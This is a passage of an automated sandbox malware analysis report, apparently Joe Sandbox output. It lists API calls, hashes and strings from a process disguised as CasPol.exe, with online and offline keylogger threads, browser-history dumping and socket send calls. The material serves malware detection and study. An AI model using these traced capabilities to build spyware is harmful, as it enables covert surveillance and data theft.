                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                            • String ID: KeepAlive | Disabled
                                                                                                            • API String ID: 2993684571-305739064
                                                                                                            • Opcode ID: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                                                                                                            • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                                                                            • Opcode Fuzzy Hash: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                                                                                                            • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                                                                            Strings
                                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                            • API String ID: 3024135584-2418719853
                                                                                                            • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                            • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: GetCursorInfo$User32.dll$`#v
                                                                                                            • API String ID: 1646373207-1032071883
                                                                                                            • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                            • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                                                                            • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                            • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                                                            • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                                                                            • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                                                            • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3525466593-0
                                                                                                            • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                                                            • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                            • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                                                            • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                              • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                                                                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 4269425633-0
                                                                                                            • Opcode ID: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                                                                                                            • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                            • Opcode Fuzzy Hash: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                                                                                                            • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                            • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                            • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
                                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
                                                                                                            • __freea.LIBCMT ref: 0044FFD4
                                                                                                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                            • String ID:
                                                                                                            • API String ID: 313313983-0
                                                                                                            • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                            • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                                                                            • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                            • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                                                                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                                                                            • _free.LIBCMT ref: 0044E1B0
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 336800556-0
                                                                                                            • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                            • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                                                                            • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                                            • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00434413,00434413,?,00445369,00446B52,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?), ref: 00446F58
                                                                                                            • _free.LIBCMT ref: 00446F8D
                                                                                                            • _free.LIBCMT ref: 00446FB4
                                                                                                            • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FC1
                                                                                                            • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FCA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                            • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                                                                            • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                            • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 0044F7C5
                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                            • _free.LIBCMT ref: 0044F7D7
                                                                                                            • _free.LIBCMT ref: 0044F7E9
                                                                                                            • _free.LIBCMT ref: 0044F7FB
                                                                                                            • _free.LIBCMT ref: 0044F80D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                            • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                            • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00443315
                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                            • _free.LIBCMT ref: 00443327
                                                                                                            • _free.LIBCMT ref: 0044333A
                                                                                                            • _free.LIBCMT ref: 0044334B
                                                                                                            • _free.LIBCMT ref: 0044335C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                            • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                            • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                                                                            APIs
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                              • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                            • String ID: (FG
                                                                                                            • API String ID: 3142014140-2273637114
                                                                                                            • Opcode ID: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                                                                                                            • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                                                                            • Opcode Fuzzy Hash: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                                                                                                            • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                                                                            APIs
                                                                                                            • _strpbrk.LIBCMT ref: 0044D4B8
                                                                                                            • _free.LIBCMT ref: 0044D5D5
                                                                                                              • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00434413,?,?,?,00434413,00000016,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                                                                                                              • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,?,00434413), ref: 0043A888
                                                                                                              • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000,?,00434413), ref: 0043A88F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                            • String ID: *?$.
                                                                                                            • API String ID: 2812119850-3972193922
                                                                                                            • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                            • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                                                                                                            • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                                                                                            • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                                                                                                            APIs
                                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                              • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                            • String ID: XCG$`AG$>G
                                                                                                            • API String ID: 2334542088-2372832151
                                                                                                            • Opcode ID: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                                                                                                            • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                            • Opcode Fuzzy Hash: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                                                                                                            • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442724
                                                                                                            • _free.LIBCMT ref: 004427EF
                                                                                                            • _free.LIBCMT ref: 004427F9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$FileModuleName
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            • API String ID: 2506810119-3657627342
                                                                                                            • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                            • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                                                                            • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                            • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                            • API String ID: 368326130-2663660666
                                                                                                            • Opcode ID: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                                                                                                            • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                                                                            • Opcode Fuzzy Hash: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                                                                                                            • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                                            • String ID: Offline Keylogger Started
                                                                                                            • API String ID: 465354869-4114347211
                                                                                                            • Opcode ID: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                                                                                                            • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                                                                            • Opcode Fuzzy Hash: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
                                                                                                            • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                                            • String ID: Online Keylogger Started
                                                                                                            • API String ID: 112202259-1258561607
                                                                                                            • Opcode ID: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                                                                                                            • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                            • Opcode Fuzzy Hash: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
                                                                                                            • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
